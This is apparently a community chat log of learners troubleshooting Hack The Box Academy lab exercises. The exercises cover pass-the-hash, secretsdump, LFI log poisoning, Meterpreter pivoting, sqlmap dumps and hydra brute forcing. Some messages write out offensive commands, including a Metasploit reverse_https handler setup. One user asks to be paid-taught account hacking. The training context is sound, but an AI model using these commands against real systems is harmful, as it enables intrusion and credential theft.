@mystic light I asked yesterday too and there has been no response. I am working on other things, it just bothers me that I can't solve that one.
i don't even know what your question is
@glacial hazel BROKEN AUTHENTICATION: Predictable Reset Token, question 1.
I have tried through vpn and the pwnbox,
have tried multiple time options,
I've made several adjustments to the reset script,
I am out of ideas as to why its not working.
The token must be calculated based on the server time
is not the server time the time it shows in the browser when you reset token?
i think so, yes
What exactly is the problem?
it goes through the 2000 possibilities for the +- 1 sec around that time to no success
To be exact, 1767 people have done it
Anyone please help me
Then you may have composed the token incorrectly.
You need to create your own password list based on the password you found.
I think the problem is that I can't figure out where I have to copy the C code in. They talk about the dbquery but I can't find this file, and now I created my own file but it doesn't work. I think I don't understand this message: "We can compile a shared object which includes this function"
this question?
Follow the examples in this section to escalate privileges, recreate all examples (don't just run the payroll binary). Practice using ldd and readelf. Submit the version of glibc (i.e. 2.30) in use to move on to the next section
Hey everyone, I am going through the Information Security Foundations path, when adding an SSH key to a VPS, do you also add the username@devicename bit at the end or do you delete that?
yes
Are you talking about a file named id_rsa.pub?
hello guys
yes that
Submit the version of glibc
|| https://dev.to/0xbf/how-to-get-glibc-version-c-lang-26he ||
You just need to append the contents of the id_rsa.pub file to the authorized_keys file in the .ssh directory in the home directory of the user you want to login as on the server
thanks a lot I try
So the username@device of the VPS I am trying to connect to?
don't touch anything in the file
Just copy the contents of the file like I said
ohhhhhhhhh I see what you're saying
ye
vultr makes you copy paste the key so I was confused
AD enumeration & attacks, privileged access, 1st question, the command on bloodhound ||MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2|| provided by the module does not work, and as the module shows, this is the only way to solve the question, do i need to log in bloodhound as another user?
Active Directory Enumeration Skills Assessment Part 2. I used secretsdump.py on the sam hives and got hash INLAN___.LOCAL/Adm_____:$DCC2$10240#Adm_______#33______<A HASH HERE>__________________ can I pass this hash to logon by using: proxychains /v:172.16.7.__ /u:INLAN___.LOCAL/Adm_____ /pth:"$DCC2$10240#Adm_______#33______<A HASH HERE>__________________" I'm not sure if my syntax is wrong, or I just can't pass the hash this way.
I don't recall having to change users there.
i rdp'd as htb-student in the spawned target ip, i then open bloodhound and paste this command in the raw query field and i get "no data returned from query"
Hi, i am stuck in Broken Authentication - Skill Assessment. Im trying bruteforce password for ||support.us|| user using the next wordlist
||cat /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt | grep '^[A-Z].*[0-9]$' | grep -E '[$#@]' | grep '[a-z]' | grep -E '^.{20,29}$'||, any hint?
if you haven't imported the data from sharphound, then the query will not work
the module doesn't mention anything about importing data from sharphound, how can i import data from sharphound?
You need to run it, then you will be presented with a zip file of the findings which you can import
cool, thank you very much
same module, last question, do i need to do anything before i attempt to use mssqlclient? what am i missing? i get timed out, im using this command: ||mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth|| the question asks me to connect this ip
i tried running powershell and sql commands on PowerUpSQL but they did not work
Howdy! I am currently having a problem with the IMAP/POP3 segment of the Footprinting module.
The problem is, I logged in to the email of the provided credentials via email client Evolution ||since all I get for credentials in the directions is robin:robin, I can't tell if the email is robin@inlanefreight.htb or robin.dev@dev.inlanefreight.htb so I used both||. Kicker is, when I try to refresh the inbox/drafts, there are no emails (when I am pretty sure there are supposed to be emails of some sort, per the directions).
If I may ask, and if y'all know, may you kindly help me amidst this predicament? Thanks for reading, and I hope y'all have a grand day! (also if you do respond, may I kindly ask that you ping me?)
sorry, I just realized that I needed to exit and reenter the email client (how silly). I thank you all for reading again, and hope y'all have a high quality day!
Hey guys, I've been trying to troubleshoot this for the last two hours. I'm trying to replicate the example from "Pivoting, Tunneling & Port Forwarding - Meterpreter Tunneling & Port Forwarding", but no matter what I do, I can't seem to get a shell. Can anyone spot where I'm going wrong?
Hi @gritty sundial I just read through that you complete the LFI skills assessment. I have been successful up to a point with this module. I can read the /etc/passwd, I can read the nginx access log, and I have successfully been able to add poison as the user agent. when I try adding the shell code it fails and the access log dies. Mostly I suspect from having the double quote in there breaking the format of the log. I have tried URL encoding it as well with no success. So I guess I am asking for a small hint. what am I missing here. any help would be greatly appreciated.
Lport in your payload doesn't seem to match the lport from your meterpreter session
I'd suggest rereading the section top to bottom
The port forward should redirect any traffic incoming from 1234 to 8081
It's exactly the same as the example in the section
Ok then it may be your msfvenom payload
Try remaking it
But like I said it could have been something simply overlooked
i did multiple times for the last 2 hours lol
Cause it looks like in that screenshot the shell.exe didn't finish crafting
Try putting LPORT before the -f and -o flags
Just tried, still nothing...
Hmm I didn't have issues. Not at my computer to double check. It could be that for some reason the autoroute didn't catch the final target IP
That's what i was thinking but i've even tried adding the host's exact address 172.16.5.19/23 instead of the subnet
Double check you're using the right ip
done it about 5 times
Hmm
Active Directory Skills Assessment 2, I'm on the question where you try and move from SQL01 to MS01. I have system level access on SQL01 and used that to copy the sam files and use impacket-secretsdump to get the domain login hashes for "Administrator" account and ms-----c accounts. I also got the cleartext password for the ms-----c account. I've been trying to pass the Administrator hash to login to MS01 but I can't seem to figure out how. Am I going down the wrong path here?
hey, can anyone tell me , why i am not able to connect support team .
Need some help? Learn how to reach the support team on Academy.
well if one set of credentials doesn't work, what about the other one?
same, same... were you able to find the solution?
dm me if you want. I can take a look
anyone please?
If I may ask, I have a slight predicament with DNS in the Footprinting module. If I may, when you brute force the subdomain, what is the best wordlist to use, or what did y'all use if I may ask? Thanks for reading, and I hope y'all have a lively day!
I can get back on MS01 with ms______c, it seems to be low privilege too though. I thought maybe I should be trying to use the Administrator hash there. I'll poke around with the other account. Thanks!
someone can help me in password attacks pass the hash section last question
there is no way i can get the reverse shell
sure, dm me
@heady tusk MUCH THANKS!
Currently at "Password attacks / Credential Hunting in Linux".
The question is "Examine the target and find out the password of the user Will. Then, submit the password as the answer.".
Do I need to get access to the system before or am I missing a step how to examine the target? On the windows modules we always had the credentials.
SecLists has some pretty good ones with increasing size. those are probably your best bet
HEY, I'm looking for someone who knows about hacking accounts and, in general, who could teach me cool things (I can pay)
HEY I'm looking for someone who knows about hacking accounts and who can teach me cool things(I can pay)
what is the error why pass the hash not working?
yes, you do need access to the machine and yes they didn't give you any credentials for that
Alright. Was just wondering, normally it says "Find a way to gain access to the system" or something like that so I was afraid I was missing something. But now I know and will find a way. Thanks
good luck
for password attacks protected archived. am I supposed to use rockyou.txt to crack the zip file?
this module got me confused. they never mention when u need to use which password list, the one they provided or mutated one or rockyou or some other...
think of it as a real-life engagement and try whatever comes to your mind
thats the goal of the modules, to teach you to think and understand what you need to do to go to the next step
even sometimes that be head banging or a breeze
do you mind me asking, what is that htb season tag?
playing the machines through the season on the main platform
Hi all
module : documentation and reporting
section : skill assessment
i found an admin password (Hxxx0) on the DEV01 host in a file. But it's not working. I am very confused with it.
Just want to know if it is normal or not
thanks all
Hello need help on Kerberos Attacks Constrained Delegation - Users section. I basically follow the steps but I get an error when I try to use psexec
what is the error
Errno Connection Error name or service not known
have you added the domain to your hosts file?
take a screenshot of the hosts file
Hydra
anyone had problem connecting to msf reverse tcp using vpn config? (using pwnbox everything fine)
I am doing the following module: https://academy.hackthebox.com/module/113/section/2139. During the course they tell you to Dump Memory to File. there is no such option?
Intro to Network Traffic Analysis module, Tcpdump fundamentals. "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)" this is the only question i haven't got in the whole module. Like I know what switch i need to read .pcap files AND to read them with ASCII. And if i use them both to read a .pcap file it works but when i enter them in as the answer it doesn't.
go to memory map
@spiral pelican I am, from there I am selecting the 3000
you need to right click those trucks or sth. cant remember
aww got it! @woeful ermine @spiral pelican Thanks!
np
I do think, they should clarify it better
no one for this Q ?
the format of the double quotes seems funny
try export without quote (")
Windows Priv Esc Assessment part I: Find the password for the ldapadmin account somewhere on the system.
I have ran every search variable POSSIBLE, I cannot for the life of me find this flag.
or remove your " in the wordlist arg in the cmd
It's getting wrapped in quotes twice. But I'm not sure if that's the issue.
it is a txt file and start with c
did you try some tools ?
yeah i used lazagne also
just replace them with new quotes, the current ones seem to be from word (times new roman or similar)
Did you copy paste the gobuster command?
We can see them. Might be some problem at your end.
what cmd did you use for lazagne ?
hi, is someone available to talk about https://academy.hackthebox.com/module/144/section/1256 please ?
Yea sure @keen compass
I need some help regarding in module https://academy.hackthebox.com/module/19/section/106 Anyone I could ping?
I'm not able to upload screenshots here for some reason, so I can share screenshots in DM
try to get admin access and relaunch the cmd
thats annoying isn't that step 3 lol
yep ^^
but you dont need the first one for the next questions
so you have two options here
i got it from here lol. I already figured out whats vulnerable on it, just didn't go that route yet, because I wanted this dumb flag
Did you find out why secretsdump.py gives different results? And thanks for that commentary, helped me solve it.
I'm in the Linux Fundamentals module and I'm pretty sure the target for this particular section is totally broken. I'm not actually new to Linux, I'm doing the module to get it out of the way (and because its free) and when the VPN isn't malfunctioning, the target completely freezes up when I try and list files in a particular directory where I'm supposed to for the exercise 
Anyone have any insights? Any means of contacting HTB directly?
HTTP Misconfigurations : Common Session Variables (Account Takeover)
Anyone finish this lab? I've reset the password multiple times, but I still can't login as admin
use the tcp vpn if you aren't, try pwn box and see if that works for you, skip this module if you aren't new to linux because it isn't required for anything. There are directions for contacting support if you click the bottom-right bubble on the academy site.
Post this in #858470491676737536 with more specific details like the section the target is in and maybe even include screenshots.
Contact support on the site brother
Okay I finally found where to contact support on the site... seems like its a bit harder to track that down than it should be but I've messaged them over their help chat
I'll do this too, see what can happen.
hi im having trouble enumerating users with both rpcclient and the samrdump.py
this for the smb section in the footprinting module
OK Just completed the LFI Skills assessment ... It took me going through https://academy.hackthebox.com/module/23/section/252 and doing the BurpSuite stuff step by step... and the Devils are in the details. I had to redo the whole thing 3 times to make sure I understood it. so If you got questions let me know.
BTW I was stuck on this for like 4 days
so do not get discouraged
Hi friends --
I am currently working through the SQL Map module and am stuck on this question on "Attack Tuning":
What's the contents of table flag6? (Case #6)
Here's my current syntax, and I do not understand what it's not working:
sqlmap -r case6.txt --dbms=mysql --prefix='`)' --level=3 --risk=3 --dump-all
I have also ran it with "verbose" mode to make sure it was passing the prefix properly, and it seems to be. The prefix comes directly from the hint, which states, Use the prefix '`)'.
It detects that it's injectable and it's MySQL but then fails after that and I cannot enumerate the database or tables. Am I missing something obvious here?
Thanks in advance
I'll check my note and dm u?
Please do. Thank you so much!!
I'm stuck at the last question: https://academy.hackthebox.com/module/167/section/1633 . I found the most logon failures generated by user0. but the answer is wrong? "What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? Flag is the name of the user account."
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack?
i hate this password attacks module
:/
just a question
im using this cmd to crack ftp pw in password attacks easy lab
and it says 1hour left till the end
||hydra -L username.list -P password.list ftp://ip||
is it okay?
i dont want to wait an hour to see it not work
its not that i dont want to, i dont have time to lol
normally i takes around 5 to 10 min max
considering im using pwnbox it might take longer?
its been 7min rn soo
No. Pwnbox should make it faster because it's not routed through the VPN
maybe thats the weird one
give me a sec
i ran the ffuf command for "Directory Fuzzing" and i dont see any results, not even the "blog" one where HTB Academy told me it existed
idk what i should be looking for
i mean its either this password list or the mutated
Ok yeah this one takes forever, nothing you can really do about
okay so its good
thanks!
no problem ^^
Did you configure it correctly ? AFAI remember you need give it a "wrong" condition
Can you dm me the command you used?
keep in mind given etas are for fully processing both lists
usually the full eta isnt needed even in real world situations
Imagine being so unlucky and "hitting the password" at the last in the list
nvm i just didnt see it, its right there on the screenshot "forum"
thanks for the help though
happens, but thats more of a real world possibility. Ctfs/labs usually have it to the top of the list when thats the expected way
I have a question
please actually read the link and not the title of the link
no I mean one for a real person
yeah
no seriously
I am being serious
I was just wondering if this is illegal
read the link
the thing I will talk about
bruh
It took about 20 min yesterday for me in the pwnbox with the -t64 parameter. Is that the "sam" one or the ones before. If I remember well, the previous ones went faster in a few minutes with user.list.
Hello!
I need help amigos
I've been having issues with ssh.
Two different boxes now will not connect via ssh.
Says connection closed. Tried resetting boxes.
when i do service ssh status.
ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; disabled; preset: disabled)
Active: inactive (dead)
Docs: man:sshd(8)
man:sshd_config(5)
Are you still working on this?
Hi, where i can contact support? i want to register a new university domain
On the website, bottom right of screen should be a chat bubble
Also https://help.hackthebox.com
don't see a chat bubble there
tried on Brave and Edge
none of them browsers show me it
Disable ad/popup blockers
anyone can give me a tip here
I'm really feeling a bit lost on this one. I'm on the Using Web Proxies module in the ZAP Fuzzer section. There appears to be a lack of information on how to select a wordlist in ZAP. I had to download the top-usernames-shortlist.txt to my VM, but I can't find any explanation in the section or anywhere else for that matter on how to use it. Anyone else get past this one?
its the easy lab
Can someone clarify if these commands are being ran on the Ubuntu host or Attack host?:
Remote/Reverse Port Forwarding with SSH
Configuring & Starting the multi/handler
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
lport => 8000
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:8000
I would say attack. you are listening on port 8000 than after you start the payload ubuntu pivot sending info to your attack host directly
you need to execute a payload on ubuntu while using msf though if thats what made you confused
I see, is it possible to nmap with a static port forward? Thanks, yeah I think I need to get a port forwarding from Attacker -- Pivot and then use msf then
yes but then you can only scan those ports
you need to have a listener on your attack host while executing payload on ubuntu pivot
I am assuming you are using msf for port forwarding. then you should start msf first after that execute payload on ubuntu
So dynamic port much better to scan with
I guess so, I've never used static port for nmap scanning
Yeah this pivoting module is trolling me. Gotcha thanks.
that module is quite confusing, good luck. you're welcome
Never mind. I figured it out. This section really could be explained a little bit better.

